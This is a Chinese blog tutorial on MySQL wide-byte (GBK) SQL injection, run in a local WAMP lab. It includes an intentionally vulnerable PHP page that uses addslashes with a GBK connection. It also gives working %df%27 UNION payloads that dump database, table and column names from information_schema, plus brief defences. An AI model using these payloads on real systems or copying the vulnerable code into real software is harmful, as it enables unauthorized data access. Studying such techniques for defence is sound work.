mysql sql宽字节注入_sql注入之宽字节注入

最新推荐文章于 2024-01-31 08:00:00 发布
最新推荐文章于 2024-01-31 08:00:00 发布
阅读量98 收藏
点赞数
文章标签: mysql sql宽字节注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39553705/article/details/113160060
版权

宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码

不过既然是sql注入的一部分,也搭建环境  做做实验

实验环境:

wamp集成包

实验说明:

创建使用GBK编码的数据库

实验步骤:

使用phpmyadmin进行创建数据库的时候,如果不去选择编码格式,默认会使用latin1_swedish_ci 格式

查了一下 ,和GBK类似,那就这个吧。。。

使用默认编码,创建数据库后继续创建表格

4fe931da9550

latin1_swedish_ci

这里需要注意的是,使用latin1_swedish_ci 格式进行创建表,插入数据时

当插入汉字的时候,提示编码问题

难怪现在的大多网站都使用utf-8编码

4fe931da9550

格式问题

修改字段的编码格式   可插入汉字

继续编写php漏洞代码<?php

header("Content-type:text/html;charset=utf-8");

$id=@$_GET['id'];

if(isset($id)&&!empty($id)){

$id = addslashes($_GET['id']);//进行转义

$conn=mysql_connect('localhost','root','')  or  die  ("false");

mysql_select_db("tests",$conn);

mysql_query("set names 'gbk' ",$conn);//指明数据库gbk处理,不安全的编码格式

$sql = "select * from test where id='".$id."'";

$result = mysql_query($sql, $conn);

while ($row=@mysql_fetch_array($result)){

echo "用户名:".$row['name']."

";

//echo "密码:".$row['password']."";

}

mysql_close($conn);

print_r('执行SQL语句:'.$sql);

}else{

echo  "id  错误";

}

?>

进行访问   注入   测试

4fe931da9550

addslashes的转义

发现已经被转义了,使用%df  ' 进行注入

4fe931da9550

继续注入   %df%27 union select  1,2,3   #

注意URL编码问题

4fe931da9550

注入成功

以下为URL编码:

%27---------单引号

%20----------空格

%23-----------#号

%5c------------/反斜杠

为什么可以注入成功?

修改一下   header  改为gbkheader("Content-type:text/html;charset=gbk");

再次查看

4fe931da9550

反斜杠神奇消失

为什么反斜杠变成  運  这个玩意啦?

id=1'---------->id=1\'--------->id=1%5c%27

id=1%df'---------id=1%df%5c%27---------->id=1%DF5C%27-------->id=1運'

其实就是利用gbk是多字节的编码,两个字节代表一个汉字

%df    %5c   组合出了一个  運 字

因此  可以注入

4fe931da9550

success

扩展:

爆出所有的数据库名

payload:

id=%df%27%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20limit%206,5%20%23

4fe931da9550

数据库名

爆出数据库中的数据表

payload:

id=%df%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,61%20%23

dvwa的十六进制编码为0x64767761

4fe931da9550

所有数据表

爆出指定数据库的字段

payload:

id=%df%27%20union%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_schema=0x64767761%20and%20table_name=0x61646D696E%20limit%200,61%20%23

4fe931da9550

爆出字段

注意使用十六进制

table_schema=0x64767761(dvwa)  and  table_name=0x61646D696E(admin)

根据以上信息,可进行mysql的跨库查询,查询任意数据库的任意信息

4fe931da9550

可查询信息

防御:

1.使用mysql_set_charset(utf8)指定字符集

2. 使用mysql_real_escape_string进行转义

weixin_39553705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
宽字节注入
硫酸超的博客
08-07 5264
宽字节注入函数介绍字符集MySQL字符转换宽字节注入普通注入宽字节get注入宽字节get注入2.0宽字节post注入2.0宽字节注入防御 函数介绍 PHP mysql_real_escape_string() 函数 PHP addslashes() 函数 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 0x00 null 0x20 0x21 ! 0x22 " 0x23 # 0x24 $ 0x
ECO传奇(I)
热门推荐
李维
03-02 2万+
ECO传奇(I)前一阵子为CSDN写了一篇有关ECO的文章,CSDN为它取名为“ECO传奇”。由于CSDN杂志是在大陆发行而且是简体版,因此,为了让台湾的朋友也有机会看看这篇文章,以下我贴出了繁体版: >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>最近几年来,软件工程和程序语言一
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 7437
渗透测试-SQL注入宽字节注入
mysql宽字节数_sql宽字节简介
weixin_36380063的博客
02-08 209
宽字节注入其实在SQL注入是一个比较常见的注入,但是有时候很长时间没有遇到宽字节注入,突然出现了一个宽字节注入,就是返回去翻资料,还不如自己写篇文章记录一下。宽字节的注入,sqlmap也是无法识别出来的。需要说明的是,本文的资料主要是来自于P神的浅析白盒审计中的字符编码及SQL注入,只是对其中内容稍有修改。简介在将sql宽字节注入之前,需要对字符编码有所了解,常见的gbk、utf-8、unicod...
SQL注入宽字节注入
qq_68233961的博客
07-24 1874
SQL注入宽字节注入
超级SQL注入工具V1.0正式版源码
03-31
超级SQL注入工具支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。 本工具为渗透测试人员、信息安全工程师等掌握SQL...
超级SQL注入工具
04-08
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
MYSQL.rar_SQL分线程_SQL多线程_key5ad_mysql是多线程_replacer4s
09-24
MySQL是一个真正的多用户、多线程SQL数据库服务器。SQL(结构化查询语言)是世界上最流行的和标准化的数据库语言。MySQL是以一个客户机/服务器结构的实现,它由一个服务器守护程序mysqld和很多不同的客户程序和库...
字节跳动,初级 SQL 工程师面试 100 题整理
04-02
此外,MySQL是目前使用广泛的关系型数据库管理系统之一,许多企业和组织都在使用它来存储和管理大量的数据。因此,掌握MySQL数据库的基本知识和技能将会为那些想要从事数据库管理或与之相关的职业提供一个强有力的...
SQL注入宽字节注入
最新发布
qq_68163788的博客
01-31 1350
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
SQL注入宽字节注入:原理、利用
07-14 1612
SQL-宽字节注入
【网络安全】SQL注入 -- 宽字节注入
yyyyyybw的博客
09-26 232
宽字节注入是一种利用字符编码漏洞的SQL注入攻击技术。当应用程序没有正确处理用户输入数据并在构造SQL查询语句时使用了错误的字符编码时,攻击者可以通过插入特殊编码的宽字符来绕过输入过滤和SQL语句构造的限制。宽字符是指UTF-8编码中的特定字符,如%df%27,其中%df是宽字节的前缀,%27是单引号的URL编码。这样,攻击者可以注入恶意的SQL语句,绕过验证并获取未经授权的数据。
SQL宽字节注入
qq_45521281的博客
05-28 591
GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df\.
多字节%bf%27注入
weixin_30745641的博客
04-20 842
渗透测试,注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是:0xbf27不是有一个有效的GBK字符,但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符,所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理,结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个,以area.ph...
【网络安全】SQL注入--宽字节注入
边缘拼命划水的小陈
04-07 463
我们需要构造成select * from students where name ='運',就可以使用联合查询了。select * from users where name = '\'' 此时因为有两个引号会报错。id值输入1%df%27%20–%20。id值输入1’此时识别结果为1’接来下就可以使用联合查询了。
sql宽字节注入
qq_63157899的博客
04-07 4685
sql注入中最关键的一步就是将引号进行闭合,而常见的addslashes()函数、mysql_escape_string函数、get_magic_quotes_gpc()函数、mysql_real_escape_string()函数的使用将引号进行了转义,这时我们要绕过这些函数进行注入,宽字节注入就是其中一种方法。 何时能进行宽字节注入 1.mysql数据库使用GBK编码 2.对引号进行了转义(加\) 特殊情况: 1.数据库使用了安全的编码模式 2.使用了iconv() 函数进行一些特殊
SQL注入漏洞攻防
weixin_59616219的博客
12-20 1121
SQL注入漏洞攻防
sqlmap 宽字节注入
07-28
SQL注入是一种常见的Web应用程序漏洞,而宽字节注入则是一种特定类型的SQL注入攻击技术。宽字节注入是利用数据库在处理字符时的特殊行为来实现的。 在某些数据库中,当处理特定字符时,会将其后的字符当作编码为UTF-8的多字节字符进行处理。例如,将宽字节%df%27插入到查询语句中的字符串中,数据库会将其解析为单引号,并继续执行后面的查询语句,从而导致SQL注入漏洞。 SQLMap是一款常用的自动化SQL注入工具,可以用于检测和利用SQL注入漏洞。当遇到宽字节注入时,可以通过设置SQLMap的参数来指示它使用宽字节编码进行攻击。 以下是一个使用SQLMap进行宽字节注入测试的示例命令: ``` sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql --level=5 --risk=3 --tamper=space2mysqlutf8 ``` 在上面的命令中,我们指定了目标URL、数据库管理系统(DBMS)、攻击级别和风险级别,并使用了一个名为"space2mysqlutf8"的tamper脚本,该脚本用于将空格字符转换为宽字节编码。 需要注意的是,使用SQLMap或任何其他安全工具进行漏洞测试时,请确保已经获得了授权,并遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值